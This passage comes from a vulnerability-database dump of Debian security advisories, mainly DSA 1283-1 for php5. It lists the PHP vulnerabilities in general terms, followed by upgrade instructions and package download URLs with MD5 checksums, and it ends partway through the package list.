debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2007-04-26T00:00:00", "published": "2007-04-26T00:00:00", "id": "DEBIAN:DSA-1282-1:EE0D3", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00038.html", "title": "[SECURITY] [DSA 1282-1] New php4 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2018-10-16T22:13:33", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1283-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nApril 29th, 2007 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : php5\nVulnerability : several\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CVE-2007-1286 CVE-2007-1375 CVE-2007-1376 CVE-2007-1380 CVE-2007-1453 CVE-2007-1454 CVE-2007-1521 CVE-2007-1583 CVE-2007-1700 CVE-2007-1711 CVE-2007-1718 CVE-2007-1777 CVE-2007-1824 CVE-2007-1887 CVE-2007-1889 CVE-2007-1900\n\nSeveral remote vulnerabilities have been discovered in PHP, a\nserver-side, HTML-embedded scripting language, which may lead to the\nexecution of arbitrary code. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2007-1286\n Stefan Esser discovered an overflow in the object reference handling\n code of the unserialize() function, which allows the execution of\n arbitrary code if malformed input is passed from an application.\n\nCVE-2007-1375\n Stefan Esser discovered that an integer overflow in the substr_compare()\n function allows information disclosure of heap memory.\n\nCVE-2007-1376\n Stefan Esser discovered that insufficient validation of shared memory\n functions allows the disclosure of heap memory.\n\nCVE-2007-1380\n Stefan Esser discovered that the session handler performs\n insufficient validation of variable name length values, which allows\n information disclosure through a heap information leak.\n\nCVE-2007-1453\n Stefan Esser discovered that the filtering framework performs insufficient\n input validation, which allows the execution of arbitrary code through a\n buffer underflow.\n\nCVE-2007-1454\n Stefan Esser discovered that the filtering framework can be bypassed \n with a special whitespace character.\n\nCVE-2007-1521\n Stefan Esser discovered a double free vulnerability in the\n session_regenerate_id() function, which allows the execution of\n arbitrary code. \n\nCVE-2007-1583\n Stefan Esser discovered that a programming error in the mb_parse_str()\n function allows the activation of "register_globals".\n\nCVE-2007-1700\n Stefan Esser discovered that the session extension incorrectly maintains\n the reference count of session variables, which allows the execution of\n arbitrary code.\n\nCVE-2007-1711\n Stefan Esser discovered a double free vulnerability in the session\n management code, which allows the execution of arbitrary code. \n\nCVE-2007-1718\n Stefan Esser discovered that the mail() function performs\n insufficient validation of folded mail headers, which allows mail\n header injection.\n\nCVE-2007-1777\n Stefan Esser discovered that the extension to handle ZIP archives\n performs insufficient length checks, which allows the execution of\n arbitrary code.\n\nCVE-2007-1824\n Stefan Esser discovered an off-by-one in the filtering framework, which\n allows the execution of arbitrary code.\n\nCVE-2007-1887\n Stefan Esser discovered that a buffer overflow in the sqlite extension\n allows the execution of arbitrary code.\n\nCVE-2007-1889\n Stefan Esser discovered that the PHP memory manager performs an\n incorrect type cast, which allows the execution of arbitrary code\n through buffer overflows. \n\nCVE-2007-1900\n Stefan Esser discovered that incorrect validation in the email filter\n extension allowed the injection of mail headers.\n\n\nThe oldstable distribution (sarge) doesn't include php5.\n\nFor the stable distribution (etch) these problems have been fixed\nin version 5.2.0-8+etch3.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 5.2.0-11.\n\nWe recommend that you upgrade your PHP packages. Packages for the arm,\nhppa and mipsen architectures are not yet available. They will be\nprovided later.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/p/php5/php5_5.2.0-8+etch3.dsc\n Size/MD5 checksum: 1976 59310a29eda84d4fe9c67b5c49416d3d\n http://security.debian.org/pool/updates/main/p/php5/php5_5.2.0-8+etch3.diff.gz\n Size/MD5 checksum: 113858 00f9a5309bb1706d9cdb7b8808034539\n http://security.debian.org/pool/updates/main/p/php5/php5_5.2.0.orig.tar.gz\n Size/MD5 checksum: 8583491 52d7e8b3d8d7573e75c97340f131f988\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/p/php5/php-pear_5.2.0-8+etch3_all.deb\n Size/MD5 checksum: 306940 b19f47a82ef5c2e68a5f4018a19321e5\n http://security.debian.org/pool/updates/main/p/php5/php5_5.2.0-8+etch3_all.deb\n Size/MD5 checksum: 1042 2dd49121488c5cff5889cac2b14345ea\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch3_alpha.deb\n Size/MD5 checksum: 2559862 27ed5cd0567a0fc555540202698a6af9\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch3_alpha.deb\n Size/MD5 checksum: 2560464 864b4bdb10f75c4b0a7958da5f1214b9\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch3_alpha.deb\n Size/MD5 checksum: 4931464 e0b3b96b2a0a4efb918a10d31bf8f79e\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch3_alpha.deb\n Size/MD5 checksum: 2481330 80ef844a379f8535ea88fa5cf4019e04\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch3_alpha.deb\n Size/MD5 checksum: 218650 eced56344be9f99d746aeaf933a62a1b\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch3_alpha.deb\n Size/MD5 checksum: 24948 e0f0c3cb6c0e3071bbfc2b183f3d289e\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch3_alpha.deb\n Size/MD5 checksum: 345974 5ced814e86b34458ae20ebb9862fac5e\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch3_alpha.deb\n Size/MD5 checksum: 36538 f378731e23fac95c47736f82af7f4e35\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch3_alpha.deb\n Size/MD5 checksum: 36536 654411256b1bf048e9a7c38584f5260e\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch3_alpha.deb\n Size/MD5 checksum: 18608 c0d76b322c3e128ed4aa19292066b16f\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch3_alpha.deb\n Size/MD5 checksum: 13472 81e7c32b97cc68497c940c4c1a02ee6a\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch3_alpha.deb\n Size/MD5 checksum: 5312 6c72784e641daf009d2b9e2c8c557f0c\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch3_alpha.deb\n Size/MD5 checksum: 70894 e74c5fa5f4387054f3650a9a4399c5b5\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch3_alpha.deb\n Size/MD5 checksum: 36434 77f2c977c2c250cd849c31323553f07c\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch3_alpha.deb\n Size/MD5 checksum: 55638 ef39a4ff78f6f109dc23ed63f58a12e1\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch3_alpha.deb\n Size/MD5 checksum: 9050 dc3fa926af67e6d987dc57b1a94ea007\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch3_alpha.deb\n Size/MD5 checksum: 4940 3885fd26d001a5fbdf328a7477da94f2\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch3_alpha.deb\n Size/MD5 checksum: 11836 90c42014365908dcd75dee85c903fe7d\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch3_alpha.deb\n Size/MD5 checksum: 38852 b1a11c234f9ae89b4af7a756d6ab7dfe\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch3_alpha.deb\n Size/MD5 checksum: 19598 4e726e0c124f4ba9ddb5db75f456c5d7\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch3_alpha.deb\n Size/MD5 checksum: 17542 7d78cdd61d61af3df120d2d07abcb512\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch3_alpha.deb\n Size/MD5 checksum: 40288 58550932c9c8727636561f4aebfce0bf\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch3_alpha.deb\n Size/MD5 checksum: 13380 727fd24baf76b403ee49a175955eca71\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch3_amd64.deb\n Size/MD5 checksum: 2507834 7c628e9a8fc5b10421926ef3b229742f\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch3_amd64.deb\n Size/MD5 checksum: 2508692 ac658663aaa7efd83aa0efa8dcfded94\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch3_amd64.deb\n Size/MD5 checksum: 4858878 b4d1e29e54afeffa69bc0f958a99492c\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch3_amd64.deb\n Size/MD5 checksum: 2450206 fb2df970f28d9cc7eba65b25003df50e\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch3_amd64.deb\n Size/MD5 checksum: 217102 a02611e457e9abc5f0df380ddcf2018c\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch3_amd64.deb\n Size/MD5 checksum: 24966 b6b5aa8beb2d773e22c0c5d1b3bf0421\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch3_amd64.deb\n Size/MD5 checksum: 342046 ee9cfd28f4be6b1df354ae3efb40b0d1\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch3_amd64.deb\n Size/MD5 checksum: 37036 404e7e2edf4a0b71ec48b006ede94885\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch3_amd64.deb\n Size/MD5 checksum: 36684 ce935e7da9e17ad17ba26304e00ef7e2\n http://security.debian.org/pool/updates/main/p/php5/php5-interbase_5.2.0-8+etch3_amd64.deb\n Size/MD5 checksum: 46742 9ca5a7bf665938cad895ff7963a38ee2\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch3_amd64.deb\n Size/MD5 checksum: 18656 37a106996ba9878265d3b6474782e3cf\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch3_amd64.deb\n Size/MD5 checksum: 13484 3b3a520f727a01177b6fca9d99d85fb9\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch3_amd64.deb\n Size/MD5 checksum: 5256 18ecec3176c42f1745d72de30098528f\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch3_amd64.deb\n Size/MD5 checksum: 71744 167602429d17685686bff5c952a80ebf\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch3_amd64.deb\n Size/MD5 checksum: 36402 60f38000242d348e21fa3eff61bced4c\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch3_amd64.deb\n Size/MD5 checksum: 54152 67f157a994720b2d7d2a1001a212e405\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch3_amd64.deb\n Size/MD5 checksum: 9404 d9c9db27aedf93d4bb2f955cd4130806\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch3_amd64.deb\n Size/MD5 checksum: 4902 b8c6052a76095e54a8dcf0a4350a9c1f\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch3_amd64.deb\n Size/MD5 checksum: 12052 710015a8acf09b20f6f58742e105639a\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch3_amd64.deb\n Size/MD5 checksum: 38430 69cc6f332fbaecb212a5d7b9fd31f998\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch3_amd64.deb\n Size/MD5 checksum: 19428 459763f9a0c9e4f1269be5b3c10b1930\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch3_amd64.deb\n Size/MD5 checksum: 17558 ed6cf5f61c6135597075c9b703ad9d4f\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch3_amd64.deb\n Size/MD5 checksum: 39152 bc3f12e6bfc0e470f0d4b1b6c9f11799\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch3_amd64.deb\n Size/MD5 checksum: 13020 505b75b38b063f4db1c780cb16424b7a\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch3_i386.deb\n Size/MD5 checksum: 2411998 88d0e17600b981d18dd1a369c32d3cee\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch3_i386.deb\n Size/MD5 checksum: 2412490 5e652ebd7560bf887eb598c1c864d5ef\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch3_i386.deb\n Size/MD5 checksum: 4754432 3149c68dd76e6a29069f8e8353cf498d\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch3_i386.deb\n Size/MD5 checksum: 2396502 b50b0d2afe2e1a76d6967c35c4215398\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch3_i386.deb\n Size/MD5 checksum: 213890 061401582ec1f55f3da553873d2cadd3\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch3_i386.deb\n Size/MD5 checksum: 24470 efb0d5c14e6cd21114152578ed6621fb\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch3_i386.deb\n Size/MD5 checksum: 342088 27d36d65482b379bc95802a824f25b06\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch3_i386.deb\n Size/MD5 checksum: 33408 43c723fe51e86e247c70d6618b033b60\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch3_i386.deb\n Size/MD5 checksum: 34494 a295151c7c14f915e7c46a0c16c52f00\n http://security.debian.org/pool/updates/main/p/php5/php5-interbase_5.2.0-8+etch3_i386.deb\n Size/MD5 checksum: 44140 7e7f255f27b75e05b64f5cd40a61be91\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch3_i386.deb\n Size/MD5 checksum: 17244 11cedf81f680dc610985ca2a0995de09\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch3_i386.deb\n Size/MD5 checksum: 12834 ebe341eb39463dadf92787a1c230125d\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch3_i386.deb\n Size/MD5 checksum: 5052 e443beec10f363208eac83eafe65c5d8\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch3_i386.deb\n Size/MD5 checksum: 64908 e00897589b88c8a65d2b1e7db048ab35\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch3_i386.deb\n Size/MD5 checksum: 34050 e5e35d32cdfa00a44e91473f6da94d57\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch3_i386.deb\n Size/MD5 checksum: 50618 60dc59d9647fc8708e3472d3d4ffcc54\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch3_i386.deb\n Size/MD5 checksum: 8628 47aa04a7cb429fb6a8aed372a7f0e9e4\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch3_i386.deb\n Size/MD5 checksum: 4760 f1023cbf011af72d43e7cb26893978dc\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch3_i386.deb\n Size/MD5 checksum: 11308 7c7bd9997bd905d7d115ea663e383975\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch3_i386.deb\n Size/MD5 checksum: 34472 4d297f08a5b8ec01229e134db496ce2d\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch3_i386.deb\n Size/MD5 checksum: 18396 67038c1ea0c926878ca73562b75880da\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch3_i386.deb\n Size/MD5 checksum: 16472 8e4f19c09fcf2288b821c3a59ea3b62e\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch3_i386.deb\n Size/MD5 checksum: 36448 736b1ada980988e0016637252e6eb05f\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch3_i386.deb\n Size/MD5 checksum: 12258 4d561eabc5a83f917dbdce0a8149d1e5\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch3_ia64.deb\n Size/MD5 checksum: 3269464 f953297bdb52d05333333e3516318974\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch3_ia64.deb\n Size/MD5 checksum: 3269942 67995ad3b7ae3510836eb671711ddd6c\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch3_ia64.deb\n Size/MD5 checksum: 6395120 9a080a337de31597f81d0b53f843bb34\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch3_ia64.deb\n Size/MD5 checksum: 3219626 698d4ca67369fc1022c5d049ba4caf73\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch3_ia64.deb\n Size/MD5 checksum: 234638 8777e6758c8adec972e5c0420ea4a477\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch3_ia64.deb\n Size/MD5 checksum: 34392 9dde0d246b39e45c4f9afc5870f716f3\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch3_ia64.deb\n Size/MD5 checksum: 342016 d4d23cb2801194f8ec48afc10b5b140f\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch3_ia64.deb\n Size/MD5 checksum: 50166 b24e786a70a2c92c0b4237467e67967e\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch3_ia64.deb\n Size/MD5 checksum: 48314 a325eb1a2d7c192601cb0ba17876d954\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch3_ia64.deb\n Size/MD5 checksum: 24860 7a0cf02dfd7ec3ccb1c2de063286af33\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch3_ia64.deb\n Size/MD5 checksum: 17764 4cf33907bf5b6c6e45ee987042e47076\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch3_ia64.deb\n Size/MD5 checksum: 6492 20bb9a0b213e620def6132d6f7fb7278\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch3_ia64.deb\n Size/MD5 checksum: 95606 663665e5485d4167eea753abdae1ed71\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch3_ia64.deb\n Size/MD5 checksum: 50658 fef24230246286cba1ffd4728c74da32\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch3_ia64.deb\n Size/MD5 checksum: 76592 27bcb480baa048e8016d4665c3d3e7b2\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch3_ia64.deb\n Size/MD5 checksum: 12006 3dfc41bc1c449c3c3ece9942d09a128d\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch3_ia64.deb\n Size/MD5 checksum: 6120 8647b24fb81396da4e9ab97f093a168d\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch3_ia64.deb\n Size/MD5 checksum: 15428 22ea3d42d42265f9b986b782d30b7c93\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch3_ia64.deb\n Size/MD5 checksum: 54660 c1b5ee65bcb80837cc0787ee9790cc78\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch3_ia64.deb\n Size/MD5 checksum: 27138 958106b4c45eddb5875508bb16ef7112\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch3_ia64.deb\n Size/MD5 checksum: 25076 d0b0fb5dee34ce5cfaf1aa4c4ddd5ba0\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch3_ia64.deb\n Size/MD5 checksum: 54510 8a5f06d8ee6c732668bcd5a604691516\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch3_ia64.deb\n Size/MD5 checksum: 17546 855c3e3ccae72f5101c540d66014e3f5\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch3_powerpc.deb\n Size/MD5 checksum: 2514456 27c5ba0172bf6b690a97504245609aad\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch3_powerpc.deb\n Size/MD5 checksum: 2515122 74d25c8ecf429e27cdf6ee08be7336d0\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch3_powerpc.deb\n Size/MD5 checksum: 4896152 1bef592b568bd79b87110718fa2bb325\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch3_powerpc.deb\n Size/MD5 checksum: 2464396 bb8d3d8fd211a49eec418e5d1ee752fc\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch3_powerpc.deb\n Size/MD5 checksum: 217650 fa7df522311c743ccad0e8c086e129b7\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch3_powerpc.deb\n Size/MD5 checksum: 26750 636e81fa8be42380dc6c62827afe0588\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch3_powerpc.deb\n Size/MD5 checksum: 342152 aea35065156f4f4761de08db5b5b8982\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch3_powerpc.deb\n Size/MD5 checksum: 36314 31c6420b2a977162b0c320685c850227\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch3_powerpc.deb\n Size/MD5 checksum: 35986 7bd57e817783c2da182cf6b008ef9dc9\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch3_powerpc.deb\n Size/MD5 checksum: 19172 97a8b00a31a349812e5f43c06e2887e5\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch3_powerpc.deb\n Size/MD5 checksum: 14732 0d8042a37bfa1735737ba73018eff4cf\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch3_powerpc.deb\n Size/MD5 checksum: 6738 eb50096517c37ce53f6d32c0e1988914\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch3_powerpc.deb\n Size/MD5 checksum: 70352 d5e9bc7ca602869a72b2bcd775ff0076\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch3_powerpc.deb\n Size/MD5 checksum: 37072 cc6131032681e0bd46cc5de60f2d8af4\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch3_powerpc.deb\n Size/MD5 checksum: 54032 1d28e62404a645bcef84681f38cface3\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch3_powerpc.deb\n Size/MD5 checksum: 10104 acf23adee0efcf4e46fb784e70ff296a\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch3_powerpc.deb\n Size/MD5 checksum: 6338 43100a27e7292a3307b421cc2926bda9\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch3_powerpc.deb\n Size/MD5 checksum: 12698 73c76e4500cd356d5065efc0fa340827\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch3_powerpc.deb\n Size/MD5 checksum: 38014 666eea25b6e15fb9620c2b9eb7030628\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch3_powerpc.deb\n Size/MD5 checksum: 20230 f944322fec5d11fd2324e9b52f9d2481\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch3_powerpc.deb\n Size/MD5 checksum: 18456 7cc39a0ee674de9901dea0488801eb80\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch3_powerpc.deb\n Size/MD5 checksum: 37702 9f2eb2f1c5cf48c22b0537a8931dfdef\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch3_powerpc.deb\n Size/MD5 checksum: 13742 bc9fbb4af871187d852b07d7a2a90166\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch3_s390.deb\n Size/MD5 checksum: 2609226 fd5a28f7fed874150dd54622999beaf9\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch3_s390.deb\n Size/MD5 checksum: 2609110 1e842c050fbad54d0f28c470ecc49f6e\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch3_s390.deb\n Size/MD5 checksum: 5032716 6b822d0f70f1b13c34aabf1270ac6da5\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch3_s390.deb\n Size/MD5 checksum: 2536818 8bbc730f000a22cf3d279feeb32a7f0b\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch3_s390.deb\n Size/MD5 checksum: 219684 a579ab67a507e3cba924eaeece91c2de\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch3_s390.deb\n Size/MD5 checksum: 25016 fee61a50ecb71af238456d36f53baec5\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch3_s390.deb\n Size/MD5 checksum: 342046 07c36b80c61441dcca14d0210852e48f\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch3_s390.deb\n Size/MD5 checksum: 36080 6173c9bb223a95d6078d3ec8b55e5492\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch3_s390.deb\n Size/MD5 checksum: 37170 28906f0687c88d58867bc83a6e2b1e05\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch3_s390.deb\n Size/MD5 checksum: 19318 da2e8709ea839dd1ba85d40a653f22c4\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch3_s390.deb\n Size/MD5 checksum: 13438 a7240490ae7b68f9c76f27be99f48ce7\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch3_s390.deb\n Size/MD5 checksum: 5470 dce7bc32b6241de344e9e905754ead4c\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch3_s390.deb\n Size/MD5 checksum: 72568 1a1a27bf1c7b0a4e7ed826021a5b9589\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch3_s390.deb\n Size/MD5 checksum: 37242 e386e666f126d1273dcff0885608c91d\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch3_s390.deb\n Size/MD5 checksum: 56312 c4b9ab788f563195c0774b2b53b3373e\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch3_s390.deb\n Size/MD5 checksum: 9182 101ce48cc96c6658016c6d02384f9ca8\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch3_s390.deb\n Size/MD5 checksum: 5112 182d371f959ca12746824a8460fca8f9\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch3_s390.deb\n Size/MD5 checksum: 11952 76b40c9bd5ba60645782f6c5fe7ee31b\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch3_s390.deb\n Size/MD5 checksum: 39172 e526c413cc438603403bf2085284beb5\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch3_s390.deb\n Size/MD5 checksum: 19582 a16c28f790ee726838fe541ba9a05eff\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch3_s390.deb\n Size/MD5 checksum: 18174 46dba85e0de9c6d026e1fbb01ebafbe1\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch3_s390.deb\n Size/MD5 checksum: 40516 02d1e007044656d581df5cbe86aa4b95\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch3_s390.deb\n Size/MD5 checksum: 13388 d980de2598465144efa88c8dcb655a7f\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch3_sparc.deb\n Size/MD5 checksum: 2404066 1f440ce3701586ef0a4090ece6c5579a\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch3_sparc.deb\n Size/MD5 checksum: 2404806 7ec48967ce80f9667ff043ef1a1281dc\n 